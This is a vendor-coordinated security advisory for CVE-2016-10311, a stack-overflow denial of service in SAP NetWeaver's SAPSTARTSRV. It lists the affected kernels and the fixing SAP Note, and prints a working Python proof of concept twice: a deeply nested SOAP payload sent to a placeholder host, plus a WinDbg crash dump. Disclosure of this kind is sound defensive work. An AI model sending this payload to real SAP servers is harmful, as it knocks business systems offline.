Application: SAP NetWeaver **Versions Affected:**SAP NetWeaver 7.0-7.5 Vendor URL: SAP **Bugs:**buffer overflow **Reported:**09.03.2016 **Vendor response:**10.03.2016 **Date of Public Advisory:**12.07.2016 **Reference:**SAP Security Note 2295238 Author: Dmitry Yudin (ERPScan)
Class: Denial of Service
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2016-10311
CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | None (N) |
I: Impact to Integrity | Low (L) |
A: Impact to Availability | Low (L) |
This vulnerability allows an attacker to send a special request to the SAPSTARTSRV process port and conduct stack buffer overflow (recursion) on the SAP server.
An attacker can use Buffer overflow vulnerability to inject a specially crafted code into a working memory which will be executed by a vulnerable application. Executed commands will run with the same privileges as a service that executed a command. This can lead to taking complete control of an application, denial of service, command execution, and other attacks. In case of command execution, an attacker can obtain critical technical and business-related information stored in a vulnerable SAP-system or use it for privilege escalation. Speaking about denial of service, terminating a process of a vulnerable component is possible. For this time nobody can use this service, this fact negatively influences on business processes, system downtime and business reputation as result.
SAP KERNEL 7.21 32-BIT
SAP KERNEL 7.21 32-BIT UNICODE
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 64-BIT UNICODE
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 EXT 32-BIT UC
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 64-BIT UC
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.22 64-BIT UNICODE
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 EXT 64-BIT UC
SAP KERNEL 7.42 64-BIT
SAP KERNEL 7.42 64-BIT UNICODE
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.45 64-BIT UNICODE
To correct this vulnerability, install SAP Security Note 2295238.
import socket PoC= “”“<?xml version=“1.0” encoding=“utf-8”?> <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” xmlns:xs=“http://www.w3.org/2001/XMLSchema”> <SOAP-ENV:Header> <sapsess:Session xlmns:sapsess=“http://www.sap.com/webas/630/soap/features/session/”> >”“” + “<a>” * 100000 + “</a>” * 100000 + “”" </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:WW xmlns:ns1=“urn:SAPControl”> <b></b> <e><e> </ns1:WW> </SOAP-ENV:Body> </SOAP-ENV:Envelope>“”" for i in range(1,5): sock = socket.socket() sock.connect((“SAP_IP”, SAP_PORT)) sock.send(PoC) Windbg exceptions sapstartsrv!soap_getutf8+0xa: 000000014009cd2a e891f9ffff call sapstartsrv!soap_get (00000001
4009c6c0) rax=0000000000000000 rbx=000000000bcdcfb0 rcx=000000000bcdcfb0 rdx=0000000000000061 rsi=0000000000000000 rdi=000000000bcdcfb0 rip=000000014009cd2a rsp=0000000002b93ff0 rbp=000000000bcdcfb0 r8=0000000134936c69 r9=0000000000000000 r10=0000000000000000 r11=000000014061ee28 r12=0000000000000000 r13=000000000000270f r14=00000001409f8ba0 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
import socket
PoC= “”"<?xml version=“1.0” encoding=“utf-8”?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” xmlns:xs=“http://www.w3.org/2001/XMLSchema”>
<SOAP-ENV:Header>
<sapsess:Session xlmns:sapsess=“http://www.sap.com/webas/630/soap/features/session/”>
>“”" + “<a>” * 100000 + “</a>” * 100000 + “”" </sapsess:Session>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:WW xmlns:ns1=“urn:SAPControl”>
<b></b>
<e><e>
</ns1:WW>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>“”"
for i in range(1,5):
sock = socket.socket()
sock.connect((“SAP_IP”, SAP_PORT))
sock.send(PoC)
Windbg exceptions
sapstartsrv!soap_getutf8+0xa:
000000014009cd2a e891f9ffff call sapstartsrv!soap_get (00000001
4009c6c0)
rax=0000000000000000 rbx=000000000bcdcfb0 rcx=000000000bcdcfb0
rdx=0000000000000061 rsi=0000000000000000 rdi=000000000bcdcfb0
rip=000000014009cd2a rsp=0000000002b93ff0 rbp=000000000bcdcfb0
r8=0000000134936c69 r9=0000000000000000 r10=0000000000000000
r11=000000014061ee28 r12=0000000000000000 r13=000000000000270f
r14=00000001409f8ba0 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
—|—